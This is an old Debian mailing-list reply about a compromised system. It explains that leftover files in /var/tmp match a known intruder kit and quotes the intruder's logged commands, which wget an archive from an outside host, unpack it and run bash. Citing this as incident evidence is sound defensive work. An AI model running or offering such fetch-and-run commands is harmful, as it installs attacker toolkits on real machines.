[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: files in /var/tmp

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Sun, Apr 08, 2007 at 03:44:33PM -0700, Kamaraju Kusumanchi wrote:
> Hi all
> 
> Can someone throw some light on as to what does /var/tmp/fast-mech.tgz and /var/tmp/raw directories do?
> 
> My system (Debian Etch) has been recently compromised and I deleted most of the suspicious files. However I am not sure about these. Is it safe to delete them or do you think some process expects them to be there?
> 
> According to FHS 2.3, files in /var/tmp are preserved across reboots and applications might expect some temp files there. Other than that, I could not find any other info on fast-mech.tgz file and on /var/tmp/raw directory...
> 
> 
> $ls -al fast-mech.tgz raw
> -rw-r--r-- 1 rajulocal rajulocal 165248 2007-02-04 20:51 fast-mech.tgz
I found this page interesting[0], the last line mentiones 'fastmech'.
...
ls -a
wget www.generatiapro.go.ro/fast.tgz
tar zxvf fast.tgz
cd fastmech
bash 
...
- -K
[0]
http://archives.neohapsis.com/archives/fulldisclosure/2004-08/1126.html
- -- 
|  .''`.  == Debian GNU/Linux == |       my web site:           |
| : :' :      The  Universal     |mysite.verizon.net/kevin.mark/|
| `. `'      Operating System    | go to counter.li.org and     |
|   `-    http://www.debian.org/ |    be counted! #238656       |
|  my keyserver: subkeys.pgp.net |     my NPO: cfsg.org         |
|join the new debian-community.org to help Debian!              |
|_______  Unless I ask to be CCd, assume I am subscribed _______|
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFGGhmav8UcC1qRZVMRArNAAJ9kAFB/hISE7N7jFJtL4/EqVPjhOACffTIY
Tn3UIqU1XrsWY7yEjQEpg0g=
=FLVq
-----END PGP SIGNATURE-----
Reply to: